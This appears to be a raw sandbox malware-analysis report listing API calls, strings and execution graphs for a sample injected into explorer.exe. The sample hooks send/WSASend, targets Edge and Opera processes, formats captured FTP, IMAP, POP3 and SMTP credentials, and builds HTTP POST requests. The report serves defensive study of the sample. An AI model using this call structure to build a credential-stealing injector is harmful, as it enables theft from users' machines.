                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                      • String ID: 0-FwP,Fw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                      • API String ID: 1066286714-483016567
                                                                                                                                      • Opcode ID: 97fa8b9768162d68e705b6cac01f69bc2c801310289019c75af80d2a7f575960
                                                                                                                                      • Instruction ID: aa772040770cccb778fcb1ca6806cfbfa74854c37db3951f3a2abe4ed6fdc443
                                                                                                                                      • Opcode Fuzzy Hash: 97fa8b9768162d68e705b6cac01f69bc2c801310289019c75af80d2a7f575960
                                                                                                                                      • Instruction Fuzzy Hash: 0461F339106304AFE315DF25DD84E6BBBECEF89754F040659F589E3281DB74D9048BA2

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0300265A
                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03002672
                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 0300267A
                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03002685
                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0300269F
                                                                                                                                      • wsprintfA.USER32 ref: 030026B6
                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 030026CF
                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 030026D9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                      • String ID: %02X
                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                      • Opcode ID: 198d8a3905aa3af4b3670095fe2e034ef9b692d04e27838a2018ed95a3df3033
                                                                                                                                      • Instruction ID: a2ddac5e3bd40b2578c804c37de946dd33eaccc9748611573938cb34b40944cd
                                                                                                                                      • Opcode Fuzzy Hash: 198d8a3905aa3af4b3670095fe2e034ef9b692d04e27838a2018ed95a3df3033
                                                                                                                                      • Instruction Fuzzy Hash: 25116D75902108BFEB12AB95ED88FEEBFBCEB48305F1040A1F645E2140D7354E019B60

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0300109E,?,03001010), ref: 0300134A
                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000003,?,0300109E,?,03001010), ref: 0300135B
                                                                                                                                      • wsprintfA.USER32 ref: 03001372
                                                                                                                                        • Part of subcall function 0300263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0300265A
                                                                                                                                        • Part of subcall function 0300263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03002672
                                                                                                                                        • Part of subcall function 0300263E: lstrlen.KERNEL32(?,00000000), ref: 0300267A
                                                                                                                                        • Part of subcall function 0300263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03002685
                                                                                                                                        • Part of subcall function 0300263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0300269F
                                                                                                                                        • Part of subcall function 0300263E: wsprintfA.USER32 ref: 030026B6
                                                                                                                                        • Part of subcall function 0300263E: CryptDestroyHash.ADVAPI32(?), ref: 030026CF
                                                                                                                                        • Part of subcall function 0300263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 030026D9
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03001389
                                                                                                                                      • GetLastError.KERNEL32 ref: 0300138F
                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 030013A1
                                                                                                                                        • Part of subcall function 030024D5: GetCurrentProcessId.KERNEL32 ref: 030024E7
                                                                                                                                        • Part of subcall function 030024D5: GetCurrentThreadId.KERNEL32 ref: 030024EF
                                                                                                                                        • Part of subcall function 030024D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030024FF
                                                                                                                                        • Part of subcall function 030024D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0300250D
                                                                                                                                        • Part of subcall function 030024D5: CloseHandle.KERNEL32(00000000), ref: 03002566
                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 030013B8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030013BF
                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 030013E4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030013EB
                                                                                                                                        • Part of subcall function 03001DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 03001E1D
                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0300141D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                      • API String ID: 706757162-1430290102
                                                                                                                                      • Opcode ID: 68e7ee9d988422b04dcb84e66637653924e7e9b2a5568b148787e9b8a2f9c25b
                                                                                                                                      • Instruction ID: 8293232b1d1b98df35735a811cb208f6564a2e15f16feed04c7e245a291e2bc1
                                                                                                                                      • Opcode Fuzzy Hash: 68e7ee9d988422b04dcb84e66637653924e7e9b2a5568b148787e9b8a2f9c25b
                                                                                                                                      • Instruction Fuzzy Hash: CD31B43C343304BBEB06FFA2DD1DB9E7A59AF45705F004454F6069B6D1CB7989118B90

                                                                                                                                       Control-flow Graph: 3001647-300174f (lstrlen, getpeername, inet_ntoa, htons, wsprintfA; calls subfunctions 3002861, 30024ae, 3002843)
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                      • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                      • API String ID: 3379139566-1703351401
                                                                                                                                      • Opcode ID: d3bca9882b963b3646142f6b41517c4200e32a90eb0954bfe5f4eee3077752d3
                                                                                                                                      • Instruction ID: b1121a8a96e20d0b5429c6097d1c9fb2a4437b8d7a6c217776d4468d2fb67d75
                                                                                                                                      • Opcode Fuzzy Hash: d3bca9882b963b3646142f6b41517c4200e32a90eb0954bfe5f4eee3077752d3
                                                                                                                                      • Instruction Fuzzy Hash: 8A21883DA02205A7FB5ADEADCD885BFBAFD9B49301F0C41B9D908D3194D734C9018751

                                                                                                                                       Control-flow Graph: 3001752-30017c6 (GetModuleHandleA, GetProcAddress, RtlZeroMemory x4)
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,03001539,?,?,?,0300144B,?), ref: 03001763
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0300176A
                                                                                                                                      • RtlZeroMemory.NTDLL(03004228,00000104), ref: 03001788
                                                                                                                                      • RtlZeroMemory.NTDLL(03004118,00000104), ref: 03001790
                                                                                                                                      • RtlZeroMemory.NTDLL(03004330,00000104), ref: 03001798
                                                                                                                                      • RtlZeroMemory.NTDLL(03004000,00000104), ref: 030017A1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                      • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                      • API String ID: 1490332519-278825019
                                                                                                                                      • Opcode ID: 1608de3762e92475f18eaa764b7025f067cc5d1804ac43e42c444a46ec4cc719
                                                                                                                                      • Instruction ID: 81c27c9f3d520eff6c2334cb94e5b596d21ea3dc4338e060a0300122295ee9bb
                                                                                                                                      • Opcode Fuzzy Hash: 1608de3762e92475f18eaa764b7025f067cc5d1804ac43e42c444a46ec4cc719
                                                                                                                                      • Instruction Fuzzy Hash: E5F0897678332C3BE111B3ABAD06D4FBD5CC651DA6F420191B7546B183889969004DFC

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 030024E7
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 030024EF
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030024FF
                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 0300250D
                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0300252C
                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0300253C
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0300254B
                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0300255B
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03002566
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                      • Opcode ID: 7e833180e3981e57bbf0f2262039a1ed8b0e4fb477223ea027243faa73d17dfc
                                                                                                                                      • Instruction ID: 59d289eb75f6b102a705d0b7767a8668a846e8e71c84425e558ba169f73a5d7c
                                                                                                                                      • Opcode Fuzzy Hash: 7e833180e3981e57bbf0f2262039a1ed8b0e4fb477223ea027243faa73d17dfc
                                                                                                                                      • Instruction Fuzzy Hash: 9211867540B201EFE702EFA1A52C76FBBA8FF4570AF040959F58192144D73895458BA6

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                        • Part of subcall function 030027E2: lstrlen.KERNEL32(030040DA,?,00000000,00000000,03001F86,75568A60,030040DA,00000000), ref: 030027EA
                                                                                                                                        • Part of subcall function 030027E2: MultiByteToWideChar.KERNEL32(00000000,00000000,030040DA,00000001,00000000,00000000), ref: 030027FC
                                                                                                                                        • Part of subcall function 03002374: RtlZeroMemory.NTDLL(?,00000018), ref: 03002386
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 03001FE2
                                                                                                                                      • wsprintfW.USER32 ref: 0300211B
                                                                                                                                      • wsprintfW.USER32 ref: 03002186
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03002250
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                      • Opcode ID: b318bed7bd4ae4c4191b87012e788258fb12badd9ac5364d9056ab99ffd407d5
                                                                                                                                      • Instruction ID: 4ae8ded1f34aa5b1d651977217f5e4d5e5c113f35b97e8f1e7ab46a389a26961
                                                                                                                                      • Opcode Fuzzy Hash: b318bed7bd4ae4c4191b87012e788258fb12badd9ac5364d9056ab99ffd407d5
                                                                                                                                      • Instruction Fuzzy Hash: 46A1827560A305AFE751EF68C888A6BBBECFB88344F04482DF985D7291DB74D9048B52

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,7556E800,?,?,microsoftedgecp.exe,03001287), ref: 030025BF
                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 030025D1
                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 030025E4
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030025FA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                      • String ID: microsoftedgecp.exe
                                                                                                                                      • API String ID: 331459951-1475183003
                                                                                                                                      • Opcode ID: a234a0e78d0b02004479ccb0ee33545865a309f3902067b5b9cc30bf78b889e1
                                                                                                                                      • Instruction ID: 7c2c201dfeca061360faf3d071773d6a897aad7e3c90229162e3ab6fac2edaea
                                                                                                                                      • Opcode Fuzzy Hash: a234a0e78d0b02004479ccb0ee33545865a309f3902067b5b9cc30bf78b889e1
                                                                                                                                      • Instruction Fuzzy Hash: D6F09075903618FFEB51DF909A989EFB7ACEB01255F1402AAF90092180D7354E04EAA4

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 03001B4E
                                                                                                                                      • LoadLibraryA.KERNEL32(?,03004434,00000000,00000000,75572EE0,00000000,03001910,?,?,?,00000001,?,00000000), ref: 03001B76
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03001BA3
                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03001BF4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                      • Opcode ID: 59843c6c98ff667736937613a2960a393bd80806f8f592b53c76f2c55e8fa5c4
                                                                                                                                      • Instruction ID: f2e6b916de296c1751490423b1abaf6845308c95b3bfc7cdc959c79dd09811e6
                                                                                                                                      • Opcode Fuzzy Hash: 59843c6c98ff667736937613a2960a393bd80806f8f592b53c76f2c55e8fa5c4
                                                                                                                                      • Instruction Fuzzy Hash: 6831B479702201ABEB68CF29C895B76B7E8FF05315F08456CE886C7280E735E845CBA0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:9
                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                      Callgraph


                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 008035D8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_801000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                      • Instruction ID: 4ea10be5fa6a5d7345f64f80c924029b8d23803d93bc3f9f43e87fcc7843d72c
                                                                                                                                      • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                      • Instruction Fuzzy Hash: 8911C430711E095FEF98BBBC9CAE27937A4FB14312F54013AA419C76E1DA398A40C701

                                                                                                                                      Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_801000_explorer.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
• String ID:
• API String ID: 2482764027-0
• Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction ID: 5ca6b80de1247032089130549fa17b210f7aabc9b98b1d939babecef580a905d
• Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction Fuzzy Hash: D3813431218B088FE756EF54EC98BEAB7A5FF61741F44461AA443C71A0EF78DA04CB91

Control-flow Graph

• Executed
• Not Executed
APIs
• LoadLibraryA.KERNELBASE ref: 0080A147
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0080A1BB
• VirtualProtect.KERNELBASE ref: 0080A1D9
Memory Dump Source
• Source File: 0000000C.00000002.3926284328.0000000000807000.00000040.80000000.00040000.00000000.sdmp, Offset: 00807000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_807000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction ID: 66d05f7f8dc1296bdd88b17caf206e0ba728d8aad7bcc3cc26561b301faf9f9e
• Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction Fuzzy Hash: 40515832758F1D8ACBACAA7C9CC46F5B7C1F759325F18072AD48AC32C5E959D8468383

Execution Graph

Execution Coverage: 10.1%
Dynamic/Decrypted Code Coverage: 35%
Signature Coverage: 4.5%
Total number of Nodes: 1105
Total number of Limit Nodes: 20
9358->9368 9360 30c1011 ___DllMainCRTStartup 3 API calls 9359->9360 9360->9369 9362 30c1b53 GetDriveTypeW 9362->9368 9364 30c1011 ___DllMainCRTStartup 3 API calls 9364->9354 9367 30c1bae lstrlenW 9367->9362 9371 30c1bc0 WaitForMultipleObjects 9367->9371 9368->9362 9368->9367 9385 30c1000 GetProcessHeap RtlAllocateHeap 9368->9385 9386 30c1000 GetProcessHeap RtlAllocateHeap 9368->9386 9369->9357 9379 30c1011 GetProcessHeap RtlFreeHeap VirtualQuery ___DllMainCRTStartup 9369->9379 9390 30c1090 9369->9390 9397 30c1000 GetProcessHeap RtlAllocateHeap 9369->9397 9398 30c1000 GetProcessHeap RtlAllocateHeap 9369->9398 9399 30c18e0 9369->9399 9371->9359 9373 30c1bd4 CloseHandle 9371->9373 9372 30c1b7b lstrcatW CreateThread 9372->9367 9421 30c1a6a 9372->9421 9373->9359 9373->9373 9375 30c1c43 StrStrIW 9376 30c1c75 ExpandEnvironmentStringsW 9375->9376 9377 30c1c55 SHGetFolderPathW 9375->9377 9376->9369 9377->9369 9378 30c1c64 PathFindFileNameW PathAppendW 9377->9378 9378->9369 9379->9369 9382->9327 9383->9352 9384->9358 9385->9368 9386->9372 9388 30c17b4 9387->9388 9389 30c1780 RtlZeroMemory lstrlenW SHFileOperationW 9387->9389 9388->9364 9389->9388 9391 30c109a lstrlen 9390->9391 9396 30c10cd 9390->9396 9418 30c1000 GetProcessHeap RtlAllocateHeap 9391->9418 9393 30c10b0 MultiByteToWideChar 9394 30c10c6 9393->9394 9393->9396 9395 30c1011 ___DllMainCRTStartup 3 API calls 9394->9395 9395->9396 9396->9369 9397->9375 9398->9369 9400 30c18fa 9399->9400 9401 30c1a62 9399->9401 9400->9401 9419 30c1000 GetProcessHeap RtlAllocateHeap 9400->9419 9401->9369 9403 30c190d lstrcatW 9404 30c1944 lstrcatW PathRemoveFileSpecW 9403->9404 9405 30c1934 PathCombineW 9403->9405 9406 30c1950 FindFirstFileExW 9404->9406 9405->9406 9407 30c1a5b 9406->9407 9413 30c1973 ___DllMainCRTStartup 9406->9413 9408 30c1011 ___DllMainCRTStartup 3 API calls 9407->9408 9408->9401 9409 30c198c lstrcmpiW 9409->9413 9410 30c1a3c FindNextFileW 9412 30c1a50 FindClose 9410->9412 9410->9413 9411 30c1a0b PathCombineW 
9411->9413 9412->9407 9413->9409 9413->9410 9413->9411 9417 30c1011 ___DllMainCRTStartup 3 API calls 9413->9417 9420 30c1000 GetProcessHeap RtlAllocateHeap 9413->9420 9415 30c19ad PathCombineW 9416 30c18e0 ___DllMainCRTStartup 5 API calls 9415->9416 9416->9413 9417->9413 9418->9393 9419->9403 9420->9415 9422 30c1a8d RtlExitUserThread 9421->9422 9423 30c1a73 9421->9423 9423->9422 9424 30c18e0 ___DllMainCRTStartup 15 API calls 9423->9424 9425 30c1a7f 9424->9425 9426 30c1011 ___DllMainCRTStartup 3 API calls 9425->9426 9427 30c1a86 9426->9427 9428 30c1011 ___DllMainCRTStartup 3 API calls 9427->9428 9428->9422 9434 30c2313 9435 30c2334 9434->9435 9443 30c276e 9435->9443 9438 30c2365 9439 30c2345 lstrlenW 9447 30c2240 9439->9447 9444 30c277f 9443->9444 9463 30c268d 9444->9463 9446 30c233f 9446->9438 9446->9439 9488 30c2066 9447->9488 9449 30c2262 9450 30c230a 9449->9450 9451 30c226a FindFirstFileW 9449->9451 9460 30c32a8 9450->9460 9451->9450 9455 30c2289 9451->9455 9452 30c22f1 FindNextFileW 9453 30c2303 FindClose 9452->9453 9452->9455 9453->9450 9454 30c2066 PathCombineW 9454->9455 9455->9452 9455->9453 9455->9454 9456 30c2240 73 API calls 9455->9456 9491 30c2110 9455->9491 9517 30c3295 9455->9517 9457 30c22de 9456->9457 9457->9452 9675 30c32b0 9460->9675 9464 30c269a __ftelli64_nolock 9463->9464 9469 30c3ae0 9464->9469 9466 30c26d9 9467 30cae3b _malloc 55 API calls 9466->9467 9468 30c26e3 _memmove 9466->9468 9467->9468 9468->9446 9470 30c3af0 9469->9470 9471 30c3af2 9469->9471 9473 30c37b0 9470->9473 9471->9466 9474 30c37d2 9473->9474 9475 30c37f5 9474->9475 9476 30c37de CreateFileW 9474->9476 9482 30c3774 9475->9482 9476->9475 9478 30c382c 9478->9471 9479 30c37fc __NMSG_WRITE 9479->9478 9480 30cae3b _malloc 55 API calls 9479->9480 9481 30c381d wcsncpy 9480->9481 9481->9478 9483 30c377e 9482->9483 9484 30c379c _memset 9482->9484 9483->9484 9485 30cae3b _malloc 55 API calls 9483->9485 9484->9479 9486 30c378a 9485->9486 9486->9484 9487 30c3791 CloseHandle 9486->9487 
9487->9484 9489 30c2085 PathCombineW 9488->9489 9490 30c2073 9488->9490 9489->9449 9490->9489 9492 30c2066 PathCombineW 9491->9492 9493 30c2137 9492->9493 9494 30c213f CreateFileW 9493->9494 9495 30c2234 9493->9495 9494->9495 9496 30c2161 CloseHandle 9494->9496 9495->9455 9497 30c2181 _memset 9496->9497 9520 30c20c1 FindFirstFileW 9497->9520 9504 30c222b 9506 30c88fa _free 55 API calls 9504->9506 9505 30c21b5 CreateFileW 9507 30c21cf 9505->9507 9508 30c2223 9505->9508 9506->9495 9510 30cae3b _malloc 55 API calls 9507->9510 9537 30c329f 9508->9537 9516 30c21d9 9510->9516 9511 30c21e0 ReadFile 9512 30c2211 9511->9512 9511->9516 9513 30c88fa _free 55 API calls 9512->9513 9515 30c2217 CloseHandle 9513->9515 9515->9508 9516->9511 9516->9512 9533 30c2dc2 9516->9533 9646 30c2ec5 9517->9646 9521 30c210a 9520->9521 9522 30c20e3 FileTimeToLocalFileTime FileTimeToDosDateTime FindClose 9520->9522 9523 30c2018 lstrlenW 9521->9523 9522->9521 9540 30c1fd1 9523->9540 9526 30c2057 9530 30c2c7e 9526->9530 9527 30cae3b _malloc 55 API calls 9528 30c2044 9527->9528 9528->9526 9529 30c1fd1 2 API calls 9528->9529 9529->9526 9544 30c27a9 9530->9544 9534 30c2dda 9533->9534 9535 30c2de2 9533->9535 9534->9516 9535->9534 9640 30c2c90 9535->9640 9538 30c3295 60 API calls 9537->9538 9539 30c32a6 9538->9539 9539->9504 9541 30c1fe7 WideCharToMultiByte 9540->9541 9542 30c1fe0 lstrlenW 9540->9542 9543 30c2007 9541->9543 9542->9541 9543->9526 9543->9527 9545 30c27cf 9544->9545 9560 30c21b1 9544->9560 9546 30c329f 60 API calls 9545->9546 9549 30c27da _strlen 9545->9549 9546->9549 9547 30c28a5 9582 30c3b59 9547->9582 9548 30c2879 9604 30c250e 9548->9604 9549->9547 9549->9548 9553 30c2451 2 API calls 9549->9553 9549->9560 9552 30c28b6 9556 30cae3b _malloc 55 API calls 9552->9556 9553->9548 9557 30c290f 9556->9557 9558 30c2be8 9557->9558 9587 30c2451 9557->9587 9558->9560 9596 30c4153 9558->9596 9560->9504 9560->9505 9563 30c2451 2 API calls 9564 30c2b06 9563->9564 9564->9558 9565 30c2451 2 API calls 
9564->9565 9566 30c2b26 9565->9566 9566->9558 9567 30c2451 2 API calls 9566->9567 9568 30c2b46 9567->9568 9568->9558 9569 30c2451 2 API calls 9568->9569 9570 30c2b63 9569->9570 9570->9558 9571 30c2451 2 API calls 9570->9571 9572 30c2b7b 9571->9572 9572->9558 9573 30c2451 2 API calls 9572->9573 9574 30c2b8f 9573->9574 9574->9558 9575 30c2451 2 API calls 9574->9575 9576 30c2ba3 9575->9576 9576->9558 9577 30c2451 2 API calls 9576->9577 9578 30c2bbb 9577->9578 9578->9558 9579 30c2451 2 API calls 9578->9579 9580 30c2bcf 9579->9580 9580->9558 9591 30c390e 9580->9591 9583 30c3b63 9582->9583 9585 30c3b67 9582->9585 9612 30c39a8 9583->9612 9585->9552 9588 30c246c _memset 9587->9588 9590 30c390e 2 API calls 9588->9590 9589 30c24a4 9589->9558 9589->9563 9590->9589 9592 30c394c 9591->9592 9593 30c391e 9591->9593 9592->9558 9593->9592 9594 30c3923 WriteFile 9593->9594 9594->9592 9595 30c393b GetLastError 9594->9595 9595->9592 9597 30c416d 9596->9597 9601 30c4165 9596->9601 9597->9601 9621 30c7604 9597->9621 9599 30c422e 9599->9601 9624 30c4be8 9599->9624 9601->9560 9603 30c7604 55 API calls 9603->9599 9605 30c2523 9604->9605 9606 30c3b59 3 API calls 9605->9606 9607 30c252d 9606->9607 9607->9547 9608 30c260f 9607->9608 9609 30c2687 9608->9609 9611 30c262e 9608->9611 9609->9547 9610 30c250e 3 API calls 9610->9611 9611->9609 9611->9610 9613 30c39bb 9612->9613 9614 30c39ea 9612->9614 9613->9614 9618 30c3956 SetFilePointer 9613->9618 9614->9552 9617 30c39dd GetLastError 9617->9614 9619 30c398d 9618->9619 9620 30c3980 GetLastError 9618->9620 9619->9614 9619->9617 9620->9619 9622 30cae3b _malloc 55 API calls 9621->9622 9623 30c41d3 9622->9623 9623->9601 9623->9603 9627 30c4bf0 9624->9627 9625 30c4bf4 9625->9601 9626 30c4c0f 9628 30c4c21 9626->9628 9634 30c7619 55 API calls 9626->9634 9627->9625 9627->9626 9637 30c7619 9627->9637 9629 30c4c33 9628->9629 9635 30c7619 55 API calls 9628->9635 9630 30c4c45 9629->9630 9636 30c7619 55 API calls 9629->9636 9632 30c7619 55 API calls 